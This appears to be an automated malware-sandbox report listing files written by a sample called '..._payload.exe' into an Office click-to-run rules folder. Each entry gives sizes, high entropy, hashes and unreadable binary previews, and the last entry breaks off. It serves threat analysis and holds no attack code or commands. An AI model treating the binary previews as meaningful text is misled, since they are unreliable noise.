                                                                                                                                                                      Preview:.<?>.|......,8.Og`l.._.P...713cR.|...v.....Q.`H....x..N.q.!.s*R.p..@.V[...dlX....o.<...(.Cm.....;.B.Z.A.|.W.3............@..&.T.."..c..?<..!%.m...|.......h....3.KSV+'~.f...%........I..AVV.H..R...1t..i...7.j0...sL)../.o.....\&.|..)..L33.*QZV.Xf.G%.CA"f...b.x.`...[iA..N'*...)D...Z|..c........T..<...v`PA7.:.T..+.]......:..+?......Z~.4..6.G$..8..+&...Y...c. .....".a...w..L........E?...b......B.tzppeA...T...^.\.<...t...Q....a....N&...VhwU.Rh...=....7.l.{/.....]..I.`U..J. ..I.../4"t.Z.8ykM..]:7.@1.........JM....m...._.... ..Rx....Cqh...m0&..x...K;...K..KiN.<vB.J..}.2.......tw..=..9...?..)VoC..I.....V.....Y...B.Mc|$.........s...zX.B.)...,...qp4.]LT..MGv..>".`.B+.U.8...7/..f..dc.@?//+...3..~:@#z..y.]}.e.K.Q..h..Z.:.,.....-Y.w.....F...O...5..d....1w.i.........!"1W.....o.gf...6.D.-.f..L....c!..~?w...l.{3<...@x....",..u.w.....AT.S..p..q...EI].ux..k.z.Q@F......@.....p.J.^{..eh......!.?.k,+z.#|.%sv.c.\4..v-.MP....J.%$t..fng."fb.3.......|.@..=6. .....<....r.)

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702501v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1749
                                                                                                                                                                      Entropy (8bit):7.892681073326603
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:oOLyUfKaZtxQaUZs97nPB6bCfzqloMiaFG0SD:oHuZtxEkt6bQOqMHFG06
                                                                                                                                                                      MD5:DE475042FF80154BA812C99D343C7920
                                                                                                                                                                      SHA1:F3D79149F69024F61FFC5341DAEAD6674F26636B
                                                                                                                                                                      SHA-256:C8AA6A7CE252C490F7B8D7CCF0FE6D58C3A9DB7918C813C04814A06FDC3BFFF9
                                                                                                                                                                      SHA-512:F438C490C00D5A1AB81E9645E345BE76473766B6B5DFF79C9B7533223D43846223A233A8A1425E0147007582BE0B2CF0C17E1D001DC8FA5F248A07E8C8696CAB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.\.Y......._K......T.....e..x..K..M...1y.{.../...t..)W..Uq~.Z.C!.. .`.2..*0..@..}a.uO...^@n..r*u.$k.;._a.hj..x..U.bm..6.....i....S......eu*a[..!x...B..EL...;u...8...\h....h...Q..hd2.!.v)..V..J..[..NQ..F?>.x...j.9(.(..H.f2.}o.`t..../r.5....i.Tg.HT.o....n......-g..'...8.p.p..:s.{......O%rj..A$.D.........z..j..'.........II,%.?....!.U.6GK\..9...........^G$...8l.(u.E.#...I.3o.D...i.W..8s..gl.'&F....\o....Pai......[i..r..|I.r...pY./R.6...*.u....G.9..oz,a.@NH..E.<?..'.....U...a!Z3..mu)9....P...n...+K...9....l.{N?Q..:.m... =.....4.c..D..s.S(.~.....7./.".a..c.m..Rw.....JC..D.Y...'.?}....y+...[.k.v.;.%.xH.\,$....b..j9}.uofU........uk.!...!.c,j.0T..y........$.c.j.o.....9.2.U...!......-.5~&.~.h$.. ...H}.2_.[h.)......,.......8..%.xlY.....e.....v..N...O...,J{_.....%#...{......LG..w...%....6.....tev/ .......*..V..U3.kC.]..v...-.d...}..O....m......:..L.~.....q..9...(......c.~.'.Z.y_.;..e...3.>...}q .Yz.,7.5sgKc........t.....gOI.e.F...zP..^.m

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702550v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1712
                                                                                                                                                                      Entropy (8bit):7.86327755715571
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:VpiSvJyUEWjNcYH5d1SlUhbrGo4S+IXoP5bjvlJZAvD8x3k+nhvjj5MwFjMjT4m+:nioJJrNZ7p+Ig5PDooU+hrVMHLWvD
                                                                                                                                                                      MD5:04D883438CA74904A3A251CB2CBFFDF6
                                                                                                                                                                      SHA1:544B604CC80D91BDDBE9D2D5385B43C93D43422F
                                                                                                                                                                      SHA-256:80C5B9F92255D6D3139AD02E47526EE6FB956485FFFBAB76F2609749DA42CA12
                                                                                                                                                                      SHA-512:1686517058DF2819370A2D511EF34D3EF70F8B61283BCAA2E88FB2D8D185E580F126144791A26DB474B7360D590358ECF1B241294E548FCF640EB1CF6BF43B1C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...C..fq..~..6...uIPAb.f.F(H-.Bz..L.z...w9?@.F..x.61...k?...2W.=.S.....t. .....p>QB.LY.W.1.......1......j.:....u..X...+..>sj.......X.+G.*'.P.5.?>..M.....2...F'...C..._P......]I.5.Rl..Svi....{..u..b.jd....#i.........R..P..q..Bd6P.......Ew..&....Y...l.p.F...wDU..{CpI&.3px.,.W..W.V..x.O....h.....K..qS..<..YakCn_...-.M..H.9.Z....}..}9.f....0.Aq.ta.....J.2..h..........]tJ.\.p.3;.;..e.Lo...Ex..jH..nW..f.Z..%.j.|NB...#..H..v..s.2..s`...../.g...!I.2..+..!7....ou.p.'...A.r.0..YzX..2R/n0....4od...I'.o.^Ah...OZ*....y{qkk.6P.K)......f...o..)....r...I=^sB.FW9.<.$..g...7Ud....R..."gY.j......[X.f.Q.'.J...H....."....k|I`P~.1:A..(..N.z....,.`x;].Ux...#..;,./oZ........?&....C.I.b...0...}G.......7.............V).C...f.V.Q.*...f......*....?.T.....eD....!.(.t.\.F.2.G....\.{:....at.k...0...\/../.3..{t....|..,....Jq....(..e....e..N.F.g......4...-.S.{.....B...w^...Q.....V!!....x.=..j.....Q..=.Y5....w...M..AFZ..d.0.3..k..,..!.J.VjN.jK.....b@.rg.mq....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702551v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1749
                                                                                                                                                                      Entropy (8bit):7.878762828191789
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UEPTnbQOkmi6YPaHfQluIY3ED/nyEdfqMkGqIhEn0gFlpJj14Xtiza3HQCgjBUjh:U+ndi6Tnjw/9LhOdT4X4aXXDbJD
                                                                                                                                                                      MD5:6FC34D6AAD5A0EF6FC254BFDDFC9EFBC
                                                                                                                                                                      SHA1:0A218BE2774656DEB0DAB454C45FCDE5E2F9FEF4
                                                                                                                                                                      SHA-256:9F2CA025EF7A000AA56D6640F370B941CF3B563C946EFA1E92A94935292576E8
                                                                                                                                                                      SHA-512:7D536CF0657797F42A0C7270EAA0CB7B2F3F42861A3F4408332F3FA06742510BE0CF8B9568597DC0E13FF0D64CA20E8756D42B82582D635BCD38DC6AEA729DD9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?Z6....7.C ......#.C{..l.|.....^.;.I.7,.A..~{.z...'y... !....#[.R?...]b|.....+.1Z./...5..?...h...p.s7....y.6.F.....E(..g#.. rQu.#A.t.E......#ti._....!9./.+.8r..}V......]....Q....A......m5......^. .....O.9U*....(D....;.:.4.e.-S.&+.U.W..AFa..#....R.hpy.....c...aM.(.c5.; 9...z0..... S..K..b'..R.k...K....U...<.XB.g...O.;X.=...bz.............sF.-....U..1.T)}r..%$.s..Y......qK.B..".i....l.w/.......E.#$O./.._..ir.....~?-[O..8....5..d..1..:t...Z...S$..@.=..X.$.^.(.cX.S.v......7.w...p..x.vM..<.eW..q.....-...B..........= t.. Q.9D..$..-6..3U].k.]:....[.%.j...G....+%`.8.......nI)`...a.t......u8.......@....7.....Is{.6.G..U8....v...C...c.....6oA...+.....VT.=.......E.4U%YK&&..G.]....'......s.......K.jd...B.B{..j..j....y\cG8.l.z..l....3l.@...O./.l.......V.s.....7$..ba`"....)m.....x[..q..........,c.Kn.q:vI.....x".o.[.in.Rx;.g......:../.).x{...2........8ap.....h...g.r@.wZ~.>q....=.~..X..Z........d. ...~).....$\m...&.j0..,?..O.1s.B;.....@.\H.TD..x3...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702600v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1706
                                                                                                                                                                      Entropy (8bit):7.882981361683458
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3EMxdhqsdewMXirpS7qXV2k4hs9N3tKguxmEehjWaRLKpi9tFlzu51W2bD:37x7VelR2XV2hjg4ehjWOUklafdD
                                                                                                                                                                      MD5:D127290292A4E864739950AD99AC0C9D
                                                                                                                                                                      SHA1:9BE899E74447AABF4D9888404690943F2010102E
                                                                                                                                                                      SHA-256:6B7612EFEBE887A56D93DF72913FD6E2122A945D078C411E3F45BF343C99B21E
                                                                                                                                                                      SHA-512:E4D73E5C6C62B3DD49C4F0201FE83A5BB4C12937B742270169F6AA74AB2717C7108BDD6EE65E7BEACF4D813AE1DA4FCA6DA983F428EC89980EA68B89F689E483
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?K;..<.W.?q.bS<..Qb..o.j...V............W...V..<..T..Gq..^pXg%$7.c}...N9. 3Nu.M.CU...v.V....f..Z...".RGy`,X....:.:~...h.O.....)%..}s....7....=. .@.W..W....E=.O.v.:<8)...[.Y....`X.6...im.M<....=VJ.bI+0.....15.L......=Bl.~.q.L...[~.,/.,...m.H%.|H...^M..~.....!....f4.l.KTv...O.0.!Q...p..OP...A...fJ........9.?..J+...N[.D...Bc[a.C7.>.'A.S.Y..#.g.r.2f.u...f...B.]..3.N.!...>.$.......9x.4...O..@C.!}.H6...LuY..u.......PBOxD.Y..=..8....q......0.....b..{.d...q0....0.W.z...7mi-~..g.#R....."...}..^......Y.8...N......2..$Qn.H.(..n......4O^.4R....l'!..I.8:.../..R...!.F.bu.4...D6s.N..".......8S......lg..2...oa..n_ .....k=W\b...........dAU.R..j.5..-..x%(....}.V..L#[a.s...^1C.rD.....6..n".....xb.CB.e..1.A.. .....lG..mEz7....Q..2(.........g`C5.1.'h.....$....K...h.}[Y....e........&.K..<...w{.cW.?.8O...a5...f0m._...~X3..:..L..........Z|9.....`7.z.......#O.H.y...#..X.?....).kk...~.H.iY........m...%.hP{...[.N1WSm.......@.m^R.4...n..S..T..=Py....p<..%A...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702601v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1743
                                                                                                                                                                      Entropy (8bit):7.88260209772226
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2uRHGjA7GT9fSiF9uS0jfNP1y+XiQPUehbMCUOD:2uRHGgGBfSiLuSuN9Vcmbm2
                                                                                                                                                                      MD5:4196B999E2284B88E71FA807D498F3CA
                                                                                                                                                                      SHA1:001C443445DFFD978BFD216A90D371F72676B5D2
                                                                                                                                                                      SHA-256:DB82F5FE6C11120E0E622D1037ED3BE9FF1C5F58FE1F4CC9633FCD3540833704
                                                                                                                                                                      SHA-512:9EDAC57F58612D657210B05AA0724FCAEE0BED59875B475C0EFBDF4BDE29343180BB2B643E9F55C97B7672E5AF6C762E5AEDC2B3D1628BCD8A1605E567EBED86
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..w.t.%.F2\)3P.I...[{N.\.;......U......1...9..2x.....G.<.+...]...f?.8(nt...V.fh..W.Y@K......b...C.d@A.).2q!.8.....~t..9i.....N....W..!1.<.?..s.W-.xQ..|....-....O/nmU..0.4"g."..:x...v...`..d.p.^...3.ET^.D.O.*S....)y..tG. ...1....+}#G.........f.^.W.&'.BVn.A..2U......?.f.Z.bPi.l...x.\....`....(.SX.#~...-..`.)...q...S.n.............wN..+......Q.D....}....&q.vez....{>O..].....'.8..&d5...w....}.../.-.8&..M.l1...`.F...,...Q./.2>G...^."$....`.C....."zM.2....kcgY.FA.^~.......%O.@...usv.1.?...Hc..,=........B..L`8.p_...g . |.....3...*@B...XJ.....f....W.K.....O.M.....W\Bs.Nw0nI...3.w...C.REM....}..B..../]3r;.\..<..O=!..~~....<Q......k.G..#.....Xo.@..x..~....0.AI'.GT...:x.j..9.0.e....~..;.....FA.....)Ds8p...S..............M.....C.}....E.-..~..B. |....1.^.^%n;pQ.....-g,.'|.;..}.".['...cp.....<...0.n.|..e.I.3....6..X.f...].....z..a.ez._K~j[...QE.}}Er5..Q..^.......$q....$.`.)q..w..]...c..G.E....S........N..3...8.#.....e...@m.....+....c...s../.=2..jF

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702650v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1692
                                                                                                                                                                      Entropy (8bit):7.898509912493936
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:4aeIsjkZXLZeBWns3jJZqnE9KsaDo0KSWEcM84D:BYjkVLZQHOx7cUWfk
                                                                                                                                                                      MD5:4737E18261C84971322E2A8113883429
                                                                                                                                                                      SHA1:97B0D25DBC2DC6B5631ACBD5CB57E8B7A688B3F7
                                                                                                                                                                      SHA-256:26889A30811A343A67A71EA786B783D87A6872AE50DAC4D3A1342F7D8D844D39
                                                                                                                                                                      SHA-512:48AD6D2B1D0C54FF2E17487E2414B3E3D4315A92DF15450A49AB6B5629C9182BB6A2CB476854AAAE494B3363B4E5137FCD917F1F685C3F9EC2CC351E974B2A45
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?....O^..|.5{.T...."m....Xj...Zh........mS]...RE....w.U..;YR...d.s.L...$..,&.-...l..WB...q.V.B....I....l.l.rBd^.X. ..C~F.S.Gw.t......i^r%....oq....O..7.U.8......i...A..Y..WVs..(=.u.w?.g.D.g1."w.....q...B...Z.|d...X#._q>Du.+.gZ..Q.*{ds255.Y[.{..+.o.+......zgop.h(.W...0..`.!..zxW....k\.=./....<W...S.sAW.I/...@.........0r.&.>>..]..Q.._G3...T....P4.^U.q9.....[.#...v"=GN..6......V..E.........a..5..(!A..V].=]K.s.v.f]..#!...2..#/i.;x.Et.../......s.SN. ....@.'.l.2...;A.u."gO._..oX.e.NH.Y.Y.._.(.8.......E....e.K4.\.=.04.`.E4B.ac.v.S.R..BkG..M..93........*S .5.@..C...4. .......$3......j...c......B.....o...4)..;.y..V,..L...d.\.d..y.....K.`.....s....d....p..E..GO..8............H[/.G.. &..Q.H.s.]~'FRs.......b.ZI..T....1H...%.&...7.&.........M.I-.W..kSy..iQ...4..x..rF.....\..)..y./.1..oN....`.9k|..7.W....C2.$P..]...V2.V..j...z....gz..*6~..k..E...';.{D.......Q...\Zr..w.Q!7..[p..6..p....b.O..i...{..h..F....[........Wi.....\.)}...R....H.O. .....|.:U

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702651v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1729
                                                                                                                                                                      Entropy (8bit):7.877176870014643
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:5W180viG1w6owaOmp5nyFJ7Ze5cVFBq5RtSWh3SxfoGgAX+rrjKBi62bD:cvd2pgFW5cVi5RoWBezgreB6D
                                                                                                                                                                      MD5:616F6807271928B67683690E6DBBE7DA
                                                                                                                                                                      SHA1:E88E8DB311CF04942438B3A5709E012999370B5D
                                                                                                                                                                      SHA-256:9D6C8425CB151B0619DD20BE91069DCE1A8172AE00AB108C396687B27245E890
                                                                                                                                                                      SHA-512:6A4ABDF6998F20BBEB8A71E6B80E5B3C52C9263D772EAC769B78DB3F528C7AA8CC152791A12E79D73A51E865B587DAA2AC20A944D57EEC6BD208AA162500021A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?n....wR0..e..t.`.\...D.i.N...W.jf.....3 .....1.......-.==}#.8i8.*x...|....+...%..).z.6..%...u.K.+I.H+..R~..>..9#....1..l....J..1.t+:h......6...BU...X,..y.hW~..m.)..i..O......Y..\...!...E.uVI.GAA...~o.P........5...UP.V[x..e....R.=.ey?*.......\...*.n.-.~.|.S.Y..v. B.@e.....L...=.Aaw L}9.......,i}sJ..~@..9OU5[.K.8..W2<[..#G.-3..T..KsR*>...sW........}h.#..+=...K{....Q.(.v$..M..Q.o'g...~U..(=..c.~.....7w.pO.`i..%.....u.uh.-.q..L.%...F....s.)...r....YR_%G.....Jw...L..?....P'+.LJ..{Wu1.".....({..a....8......J.Gm.......F.i.C.A.#G.2.<..co...J..W.....w.....7p........C.........Ru.)....p...|5'(su.^}...{.o-%x..Jd.g..z.:..\...G.[.6}>. Iw..'...`.........a4&f..<.V...!...)........c...{.$....1.$.#..A@)h...q....#.<.9.].H..,.i.[U.Snj...M.~....,..S`oz.!.'.%.T".M>...=4..8.%..Vq,.../.l.eR..M.!.y2....F...k.....$.`.".....G...].0.?.{a.<..#.2...J..f.......[.....S0.n.K..G..8.....e........J.rW...>.....j..a..U..2..Ox.!..m..p1..GR.LE.6!5........G2v.h..I}.\.)3..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702700v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1701
                                                                                                                                                                      Entropy (8bit):7.8725803364340985
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:uqat1Rm4ZWfT9Bq0o1DaloBHW9feOpLlyOE5vfA2PW0sOEDD:GfmqOCiiifeucOEB4kLsJ
                                                                                                                                                                      MD5:7C7281A225ED3D64BA20438DD4A6D12C
                                                                                                                                                                      SHA1:ABC650AC5EEB04C31E0D538A99660B7697C9A162
                                                                                                                                                                      SHA-256:D9642FB3ACADEC799AA577451FA8E770FF80F804216065BF826A9F313998774E
                                                                                                                                                                      SHA-512:4BC01E90BCAA5B7B0F5F229B6C5392B2FBB0D2F41AB5BE36F45270ED91ED8AAAEBE4FE8B77EF102C409B9F939395ED57C8E98D05B0CF838F27A3F65A2448F3EC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?."...Q......7R..d.U..xmxq.j...;..=..r#..:.....s.M.I`~...$w=Xv.}...d"....CK?m.6..*.. ..<gx.....RD..kA...>.@F..#.a.<.`BW"KhO............ACs.f.K.E._.n....s....t|%.{...?.H55.9.i7G..s*1.:{...;gFI.....A...`..B=".....#.I{}..(.eM)jg.EUI..).8l.rZ..o.h...<..M..%7."....p......ld.]<...._.......&Y(/.h..nM....@...M-I.:~...I]..........R.r..q.z.A....._.t..^.t./......P.&E.u_T........5jJlI.O..f..X..R...h.J.[.ck6.....!.............L`._....t<.o...J.-..Ig.....b..t...d $.#.R.%..= ././....H...P..2f...c.c}.]..f..D..]]..:.[..7%a.zw.W.h..%$....(ec........da.i.^;+.9.lR........4.....n.].AM..8.e!.w....x.....f..+..%.....%....}.......YK..u7j...B.0v...(.7.....a....0.j...'.>.f6C/.l....r..w..g.d *.....M...&.`56.....+9.G5...m..B.Q...%U.R...^...8R.Vk&...=.U.2..C.......@...?........y..jS}g]..Qw.a{s.mR_.g...~.kG...?........)W}?x.j..l.tz.}L...h.z...2..8...!|Q.9.]&.\.V..o.... 6...n...G.h..$.....O.D.u....K.#.6....#.xm...Y......i<.53.eD1E........[nx.-+o...<."..Yb.I.u .,=......d

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702701v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1738
                                                                                                                                                                      Entropy (8bit):7.877947621349102
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Scx0vINPF6qwM2i/cpTv9JXMpjag2mHmYLkHiRaKZUPvz1NXFDsG5IeDAKjM2bD:ScduqIihHtCiYmc7FIG5TDTfD
                                                                                                                                                                      MD5:7DB569547061CF2FBDBC6716B782130D
                                                                                                                                                                      SHA1:B55E288AFD8850C12807E26BD5C9746A8C738B6D
                                                                                                                                                                      SHA-256:ECC53C11F41C9335B1D605A309E158F1919D4D5AD8365462A492C7E03813F35D
                                                                                                                                                                      SHA-512:247FAEFE6B4BC6BA9C66152868A5E0C185394707CFE9C6909B6CB7500F7551EA22E655399ACCD8215EF6C7C549786A6B8F8DDC43D69EA21E66AA75DE8F178C3B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..d..H1..k..X(......vd.5..[..@./.R..k.of.k+.....1"...G?~"7U..P....-..0......m.....%.{.nh..}H.*..1.]r......[W.V.S6s..pF.k&.I...3..#....")8.....V...8.U....f.M.;X.r9..[ .vH.4{.WB.Qg..T.B..<.$.e.B.CX..\.....-Trp.....\.t....?......xn.K......1..o..83. ...:.j..z4...D..McnE..<....t..3.........gB..{......h.G.............MFB...Maq...t.H...){...@GAK.<'d.\.*.......v....$.".B'..y..5.......|Np.8...I.".Wj......f3.y.LA.A%.....c"..s.........EP~..Z'b6}H.....O.%.MM......\.2qIi.Wl....u.....hDl.:.%..Q....v.6jW.#p...\.%c|x...q..T.+...."g.?.Or>.Q..H.>_.Wj....)...n.H,D.....XGw......2+.PYFc.....8...%V.Z..=..y...I.\X"..j..m....ys..k..<A.....z...X.2r.2_........Z...p...#.^.$j`.H. dC....;..lnvQ.........ku........q..sLLz..k..*....Q>~5J..^..#D...E.9:X...a.{.P.l.....;..Y....&3.`.{..=..S....\.H...M..^........1...x.{.'"..\....~..2....U-.3i..w.%.<..U.kv'.-/.i.....&.....c....Y.l.6^.~.f.NXL..(&..x)#`.%......8......\X)].....!. .Z...D`....%......]..j.SM...1cG<..V.:gK..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702750v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1700
                                                                                                                                                                      Entropy (8bit):7.894191630121574
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:O1dOcOQ6sGLyMNLrnhTb9+F5mnEWBu/7CG/D:OScODtLH3hUmnE+u/7L
                                                                                                                                                                      MD5:B28AB777B27B8DAD549D291D63678F01
                                                                                                                                                                      SHA1:F0A357CA60622BE4531E1AC77F1E53E7D8B17A1C
                                                                                                                                                                      SHA-256:4BE4CFED92A3C3527191963ADDF5160ED5BB1344113D28C77775207DE8D9C98E
                                                                                                                                                                      SHA-512:6E6E15AB6387C06B8A9157E289CC56FF4DA2C2EF13D307ECC518EA5EF3FC0F29D68A234F3EB5BC6D0BE9251F44468A2B4CE7C372BD1E2CAE264F0EFF9ECFB883
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?....nt^....7...BS...5...dG.G.?.%....R...s.S.QM..bn[!..#..X..O...,.Jk......5"......+j....&`X/.P..dW.`.].?r]@...5M8.3...$.n...5.L..[vD[<0y.......y..].\m...u.....'.......2,.h...ro.y......Y..{.v*@....^..o%.!..e.}.%.e.d9."......swM..K...i..3.Vp.....T..W..c..m.Vi.....U.......7.O.?....e..s....%.r..;....,...g...tG....V...}.I......5....H.T]j=.'"fx.. ><...Q..s...Q.DL...^F..,....cb.W.oh......u.t.......E6..X...P....b+j.=4pxG.[....5o..6...[iL.s....<.L....j.o.\..Wy.......75.f..\.Me.....!.G.j.-.X>.b...X......o&....EKC..D.CB>..C.......T.;.+NB!...o.#..i...4?.%.H7..........K~.A#.+..?.3...T...0A.3...J.l..N...z?....;.CL+......A...hKP..WH..).8:c.8wF.._l.G..4C..Q.i...x.K....l_.2...I2.X........r.6..N.SU^x..A.iy...3u_A..2....S....w..T.r.;..5...u.........IiT.R^...E..p...':...j.....3......}...j5.k.\,..f[.....1...D0.@.>-..!.m$l(z.....J..:.m.=?.Y..*...Lq.P*.c..D...NM.........!.U..%.J...:...X.!.p..V.e ..A....:._...K...|.6...6D.5..#..r...1z.8...e

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702751v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1737
                                                                                                                                                                      Entropy (8bit):7.897171902775961
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:kSH2TOcai269tiwJx4p797dg1thkJsWm01rd6OD:aTOcJ269gMk97dg1t2M03
                                                                                                                                                                      MD5:72E3FE73E521DFF1D261E7FC0D50F3F7
                                                                                                                                                                      SHA1:D734A88866F3A532E279BEBF68888876C22CA80D
                                                                                                                                                                      SHA-256:9318DA976B6BCB665B098DBB576606600B29C0DABAF2C05780F1AB510F494E76
                                                                                                                                                                      SHA-512:D26FC10633499BD5978C2C3A71FC01232AD1EF6FD1C0FFA2CD03FC8416A78B6ACD7B939E679D5DD8E1940171D28438CCF79BFF3F9BC9898CB2BB31E6596CE309
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?"...(.Y=V..B..T..TCO.X.^./.......u.BQ...b...I9...........?^JSt...h.G..%)..C.!Z.....E.z'.)..*4....X...|.R.Y0..:....,...+....m....h....N.PQ..DYu)y.|Q.9...w.....A..W. '.u.@..P........-..a.1...b......R....G...jic...z......F....(...'......8I.....J....$.q.%._...Y..{...Wz...]...t.......Ui..5.y..f....e1.H....C.|.y.Y..%[...vW.u.s....J...R#.#^(..:..8.....O.3...(..BY..m....P..m....K.R...Z.....~..[Q\.L....N.d."...}."...`.B64....C.1.|9.l.d....0.e.......:.aob..Xy._\5.Aw........I@..)2-.....@.....U.X6.9.W.Xc{D..C...RB....</j..X...|"...rG...+.,T...a....M....R.).......B..B.NwW55.|l.QsV..S...N.*.`+...qm...tM. .....K..'.q..PlUo....m.u...a.ab=....M.#...4.P._.S.#x^..P.:...7....T..dJ...`Z.%.&...L}w..-\.k..T.'.k.K.E<...Q^.[.....<..a........6..].N.M..k_/.eN....=..I...-...h...'.....q.,*..Y.E..f{R_U...#<..J.ex.^%&.Ti...H.E .X.as8..H..E..8..X,..)+..'.......I.....a;.......Zx....G.k......:...... Ab.......#s.<4.SW.RG.;0.[{Jn.G[.2...3.>..D"....;..l.h

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702800v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1688
                                                                                                                                                                      Entropy (8bit):7.880035112308296
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:HaBJLua3/EwFhGnVNVKVGu545hJ6eQDjaxUcPYD9ySJ1IecOXvmxdIYRAdpi8D9c:6jZPEIYrEfCPwBLJZrOxdBkpd9H2D
                                                                                                                                                                      MD5:BEE64EABAE95AF4C53F7B0E124A5A3E3
                                                                                                                                                                      SHA1:070380A92ED04591BC133D23CAF16C18BC9D00E4
                                                                                                                                                                      SHA-256:0E4B1D4DE1259E1CC2242CE2157F4FB1A2E7E3850A0F478FC911AE489687E590
